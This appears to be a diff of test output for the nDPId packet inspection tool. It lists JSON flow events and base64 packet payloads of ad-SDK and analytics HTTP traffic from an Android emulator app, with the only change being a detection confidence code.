01366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1654385183642,"pkt":"nLbQ0+MztKXvZygQCABFAALDo6BAAPUG04cDSEWewKgCfgBQ2yiEIaiX5OPZ5YAYAHBkvQAAAQEICn9GsqN7FprnSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA0NTcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/1RSTW\/UMBD9L3M2UpJCKT6XAxLiQLlVlTU7nl2sOnawxylhtf8d2c7ScsrLG79583WGLCglgx4VzPkEGnIh4pxBgUVB0GegWIKkzVC0DBruP4OCpRy8yz85GWdB33y6\/aCgBCcPLOLCCfTjGZBCy4v2IZZE\/NVlaYEqGRWImzkWAX0zXJ4U4Fx9uqJBM+Nv0IMC\/BVATxWIN3ario5lWxj046Ru1PuaQf4U0AAKCL0\/ID3\/aA\/GV8Kk4nfmsPTvW9CjkwKyJqFwsycfMxv0nOTN\/6GIxGAse9y6vqTEgTazt2fR+c0sHjdDuDSl5VNCy\/cuV\/r71cD6wNJsOdhMiTnsrU0KHMXQm\/KCR56lug31L6YXAn07KAg4c38Tj8fMvcyYHAdBcVU\/KFg8Es8cpNY3fRynsXGbIbHx5d+brbV3kGBkBv1uVJBsIukLSIx22yczDpU4Lmtf5hyT70jotXpZDQcL+m5oOAumvr56LF9q4O5uVLDup7JSnegRi++HsDrL0bggnJDErbxnHq6h\/OwWkzj\/L2hsPa\/ewOqSFPTmuqF6xN3kWx3c5ely+QsAAP\/\/AQAA\/\/9ly17OCQMAAA=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01985{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1198,"pkt_l4_len":1164,"thread_ts_msec":1654385184096,"pkt":"tKXvZygQnLbQ0+MzCABFAASgVf9AAEAGu7jAqAJ+EkBPOqkCAFAzMfZOPPsrTYAYAfYpMwAAAQEICgK1DRCN++PnR0VUIC9vcGVuYXBpL2FkL3YzP2FwcF9pZD0zMjQ1NiZ1bml0X2lkPTg4ODEmc2lnbj0zYzI4ZGVkMDRlMGY0MDkwMjI5OTY4NjE4MjQ0YjU4MyZyZXFfdHlwZT0yJmFkX251bT0yMCZ0bnVtPTEmb25seV9pbXByZXNzaW9uPTEmcGluZ19tb2RlPTEmdHRjX2lkcz0lNUIlNUQmYWRfc291cmNlX2lkPTEmYWRfdHlwZT05NCZvZmZzZXQ9MCZjaGFubmVsPSZwbGF0Zm9ybT0xJm9zX3ZlcnNpb249MTEmcGFja2FnZV9uYW1lPWNvbS5zY2VuZXdheS5rYW5rYW4mYXBwX3ZlcnNpb25fbmFtZT0yLjguMi4xJmFwcF92ZXJzaW9uX2NvZGU9MTQ2Jm9yaWVudGF0aW9uPTImbW9kZWw9c2RrX2dwaG9uZV94ODYmYnJhbmQ9Z29vZ2xlJmdhaWQ9NWFjNmEwZmYtOGQxOC00N2JjLWE5MDItMjgxMmNmMGMyNTFlJm1uYz0mbWNjPSZuZXR3b3JrX3R5cGU9OSZuZXR3b3JrX3N0cj0mbGFuZ3VhZ2U9ZW4mdGltZXpvbmU9R01UJTJCMDElM0EwMCZ1c2VyYWdlbnQ9TW96aWxsYSUyRjUuMCUyMCUyOExpbnV4JTNCJTIwQW5kcm9pZCUyMDExJTNCJTIwc2RrX2dwaG9uZV94ODYlMjBCdWlsZCUyRlJTUjEuMjAxMDEzLjAwMSUzQiUyMHd2JTI5JTIwQXBwbGVXZWJLaXQlMkY1MzcuMzYlMjAlMjhLSFRNTCUyQyUyMGxpa2UlMjBHZWNrbyUyOSUyMFZlcnNpb24lMkY0LjAlMjBDaHJvbWUlMkY4My4wLjQxMDMuMTA2JTIwTW9iaWxlJTIwU2FmYXJpJTJGNTM3LjM2JnNka192ZXJzaW9uPU1BTF84LjcuNCZncF92ZXJzaW9uPTIyLjQuMjUtMjElMjAlNUIwJTVEJTIwJTVCUFIlNUQlMjAzMzc5NTk0MDUmc2NyZWVuX3NpemU9MTc5NHgxMDgwJmlzX2NsZXZlcj0yJnZlcnNpb25fZmxhZz0xJmNhY2hlMT02MjQwJmNhY2hlMj01MzY1JnBvd2VyX3JhdGU9MTAwJmNoYXJnaW5nPTAmc3ViX2lwPTEwLjAuMi4xNiZkdmk9NEJ6dFlyeEJZRlEzJTJCRlEzUlVFMERVUVFpVWxiZkFEQWZueDNpVVZQSFpSc1JyZnVIb1IxUlV2MDZOJTNEJTNEJmFwaV92ZXJzaW9uPTEuMyBIVFRQLzEuMQ0KQ2hhcnNldDogVVRGLTgNCkhvc3Q6IG5ldC5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogQXBhY2hlLUh0dHBDbGllbnQvVU5BVkFJTEFCTEUgKGphdmEgMS40KQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -01780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=2&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&ad_source_id=1&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=2&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&ad_source_id=1&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1654385184117,"pkt":"tKXvZygQnLbQ0+MzCABFAAEkBJZAAEAGB9zAqAJ+CNFha936AFBSP8o9I7uXO1AYAfYueQAAUE9TVCAvIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ2hhcnNldDogVVRGLTgNClJhbmdlOiBieXRlcz0wLQ0KQ29udGVudC1MZW5ndGg6IDc5Ng0KSG9zdDogYW5hbHl0aWNzLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1654385184118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":850,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":850,"pkt_l4_len":816,"thread_ts_msec":1654385184118,"pkt":"tKXvZygQnLbQ0+MzCABFAANEBJdAAEAGBbvAqAJ+CNFha936AFBSP8s5I7uXO1AYAfYwmQAAcGxhdGZvcm09MSZvc192ZXJzaW9uPTMwJnBhY2thZ2VfbmFtZT1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF92ZXJzaW9uX25hbWU9Mi44LjIuMSZvcmllbnRhdGlvbj0yJmJyYW5kPWdvb2dsZSZtb2RlbD1zZGtfZ3Bob25lX3g4NiZnYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZtbmM9Jm1jYz0mbmV0d29ya190eXBlPTkmbmV0d29ya19zdHI9Jmxhbmd1YWdlPWVuJnRpbWV6b25lPUdNVCUyNTJCMDElMjUzQTAwJnVhPU1vemlsbGElMjUyRjUuMCUyQiUyNTI4TGludXglMjUzQiUyQkFuZHJvaWQlMkIxMSUyNTNCJTJCc2RrX2dwaG9uZV94ODYlMkJCdWlsZCUyNTJGUlNSMS4yMDEwMTMuMDAxJTI1M0IlMkJ3diUyNTI5JTJCQXBwbGVXZWJLaXQlMjUyRjUzNy4zNiUyQiUyNTI4S0hUTUwlMjUyQyUyQmxpa2UlMkJHZWNrbyUyNTI5JTJCVmVyc2lvbiUyNTJGNC4wJTJCQ2hyb21lJTI1MkY4My4wLjQxMDMuMTA2JTJCTW9iaWxlJTJCU2FmYXJpJTI1MkY1MzcuMzYmc2RrX3ZlcnNpb249TUFMXzguNy40JmdwX3ZlcnNpb249MjIuNC4yNS0yMSUyQiUyNTVCMCUyNTVEJTJCJTI1NUJQUiUyNTVEJTJCMzM3OTU5NDA1Jmdwc3Y9MTI0NTEwMDAmc2NyZWVuX3NpemU9MTc5NHgxMDgwJmR2aT00Qnp0WXJ4QllGUTMlMkJGUTNSVUUwRFVRUWlVbGJmQURBZm54M2lVVlBIWnpLJmFwcF9pZD0zMjQ1NiZkYXRhPWtleSUyNTNEMjAwMDAzMiUyNTI2Y29udGVudCUyNTNERCUyNTI1MkJTTSUyNTI1MkJGUDJZblRlR2FsckxrUEFKN2NzWWNLdUhhVCUyNTI1M0QmbV9zZGs9bXNkayZjaGFubmVsPQ=="} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2282,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1654385184139,"pkt":"nLbQ0+MztKXvZygQCABFAACApCdAADgGcO4I0WFrwKgCfgBQ3foju5c7Uj\/OVVAYAD8bqQAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjY6MjQgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1006,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1006,"pkt_l4_len":972,"thread_ts_msec":1654385184174,"pkt":"tKXvZygQnLbQ0+MzCABFAAPgd\/JAAEAGmoXAqAJ+EkBPOqkIAFAb84J2aUKsBYAYAfYocwAAAQEICgK1DV2MHK6PR0VUIC9vcGVuYXBpL2Fkcz9hcHBfaWQ9MzI0NTYmdW5pdF9pZD01MjQ5OCZzaWduPTNjMjhkZWQwNGUwZjQwOTAyMjk5Njg2MTgyNDRiNTgzJmlzX3Zhc3Q9MSZhZF9udW09MSZodHRwX3JlcT0xJmNsaWVudF9pcD05Mi4yMTkuNDAuMjM1JnVzZXJhZ2VudD1EYWx2aWslMkYyLjEuMCslMjhMaW51eCUzQitVJTNCK0FuZHJvaWQrMTElM0Irc2RrX2dwaG9uZV94ODYrQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElMjkmb3NfdmVyc2lvbj1BbmRyb2lkMTEmZ2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmbW9kZWw9c2RrX2dwaG9uZV94ODYmYnJhbmQ9R29vZ2xlJmFuZHJvaWRfaWQ9YjllMjg3NzYzNTRkMjU5ZSZwbGF0Zm9ybT0xJmltZWk9MSZuZXR3b3JrX3R5cGU9OSBIVFRQLzEuMQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNsaWVudC1CcmFuZDogR29vZ2xlDQpDbGllbnQtRGV2aWNlOiBzZGtfZ3Bob25lX3g4Ng0KQ2xpZW50LU9zOiBBbmRyb2lkMTENCkNsaWVudC1DcHU6IGk2ODYNCkNsaWVudC1SZXNvbHV0aW9uOiAxMDgwLDE3OTQNCkNsaWVudC1QYWNrYWdlOiBjb20uc2NlbmV3YXkua2Fua2FuDQpDbGllbnQtVmVyc2lvbjogMi44LjIuMQ0KQ2xpZW50LVNvdXJjZTogMWt4dW4NCkNsaWVudC1TaW06IDMxMDI2MA0KQ2xpZW50LUFuZHJvaWRJZDogYjllMjg3NzYzNTRkMjU5ZQ0KQ2xpZW50LUNvdW50cnk6IFVTDQpDbGllbnQtTGFuZ3VhZ2U6IGVuDQpDbGllbnQtVWlkOiBlNmRiZDMwYi0zYjg0LTQ0YjQtOTc1MS02MzExNDhhM2VkZTkNClVzZXItQWdlbnQ6IERhbHZpay8yLjEuMCAoTGludXg7IFU7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMSkNCkhvc3Q6IG5ldC5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ads?app_id=32456&unit_id=52498&sign=3c28ded04e0f4090229968618244b583&is_vast=1&ad_num=1&http_req=1&client_ip=92.219.40.235&useragent=Dalvik%2F2.1.0+%28Linux%3B+U%3B+Android+11%3B+sdk_gphone_x86+Build%2FRSR1.201013.001%29&os_version=Android11&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&model=sdk_gphone_x86&brand=Google&android_id=b9e28776354d259e&platform=1&imei=1&network_type=9","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ads?app_id=32456&unit_id=52498&sign=3c28ded04e0f4090229968618244b583&is_vast=1&ad_num=1&http_req=1&client_ip=92.219.40.235&useragent=Dalvik%2F2.1.0+%28Linux%3B+U%3B+Android+11%3B+sdk_gphone_x86+Build%2FRSR1.201013.001%29&os_version=Android11&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&model=sdk_gphone_x86&brand=Google&android_id=b9e28776354d259e&platform=1&imei=1&network_type=9","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385184282,"pkt":"nLbQ0+MztKXvZygQCABFAAHmJVIAAPgGdx8SQE86wKgCfgBQqQhpQqwFG\/OGIoAYAIZCbAAAAQEICowcrv0CtQ1dSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDQ0DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjY6MjQgR01UDQpTZXJ2ZXI6IG5naW54DQpYLUNhY2hlOiBNaXNzIGZyb20gY2xvdWRmcm9udA0KVmlhOiAxLjEgMTY4ZGRiYjgyZDZjODljODRhMWE3OTYzZDFkM2RiODguY2xvdWRmcm9udC5uZXQgKENsb3VkRnJvbnQpDQpYLUFtei1DZi1Qb3A6IFRYTDUwLVAyDQpYLUFtei1DZi1JZDogeTdSbDB5c25CU0hpMC1KRW9mbkxCTU9BZ082YTMxMUEwV2w4aEVoaDllLVlIbUV0TGgwUDZRPT0NCg0KeyJzdGF0dXMiOi0xLCJtc2ciOiJFWENFUFRJT05fUkVUVVJOX0VNUFRZIn0="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1110,"pkt_l4_len":1076,"thread_ts_msec":1654385184845,"pkt":"tKXvZygQnLbQ0+MzCABFAARIuCtAAEAGLI\/AqAJ+ypnENeWGAFC6DVe05oOra4AYAfZWMAAAAQEICr1yaOhMk1pOR0VUIC9hcGkvd2Vidmlld0FkUmVxP3Nfdz00MTEmc19oPTczMSZ1X3c9NDExJnVfaD02ODMmdV9zZD0yLjYyNSZsYW5nPWVuX1VTJm5pPTAmc2RrPXZwYWRuLXNkay1hLXY0LjYuNCZ1X289MSZvc192PTMwJm5fbW5jPTI2MCZuX21jYz0zMTAmbW5jPTI2MCZtY2M9MzEwJmZvcm1hdD0zMjB4NTBfbWImbXNpZD1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF9uYW1lPTMwLmFuZHJvaWQuY29tLnNjZW5ld2F5LmthbmthbiZzaW11bGF0b3I9MCZjYXA9Y2FsX20yX2FfaW52X2NhbV9waF9zbXNfY29tcF9mcl9iYW5JbnZfdmlkX3ZpZDJfdmlkM192aWQ0X3ZpZDVfY3JhenlBZF9jYWxfc3RvUGljX2V4cCZvdXRwdXQ9aHRtbCZwZj1UVyZzaWQ9MTY1NDM4NTE4MDMzOSZzZXE9MCZiaWQ9OGE4MDgxODI0ZmYzNzFlMDAxNGZmOTVlNTk5ZjA3MmQmYWR0ZXN0PTAmYWRfeD0wJmFkX3k9MCZhZF93PTAmYWRfaD0wJmFkX3Y9MCZtcz1DNVFFbjk4Q3hsaGlSNEolMkZsQzZKZiUyQnRKbmNKWUE3MnZYUGUyTzMwJTJGUzdWVEJGMU5hTGVBRkFSNUZJZllyUmFZU1ZhQkglMkJTS1VGcjExQTJGRThHUkp6TGp0M2J1MEFBNDZMUm9nejBob0RScHNxYlZMWXUwelljVjBjMFZrZE1YblZmSmhqcEpSZ0tjeEhXbzR2UXpxNkxzd2ZBMHQ4MFc2Z0d5RnY1SXl6QlQ2YjZFMUZOSFUycFFJT2cwajlXTnFyYWElMkJpR1JxV201cHRqMXB5bXJOdjd0em5JeHV5JTJGd09JWGVES3ElMkJQSk9XenRJbjV1UTFDZEclMkIlMkJQZDBvcndjJmJ1aWxkPTIxNDA3MTAyIEhUVFAvMS4xDQpIb3N0OiB0dy5hcGkudnBvbi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYoTW9iaWxlOyB2cGFkbi1zZGstYS12NC42LjQpDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} 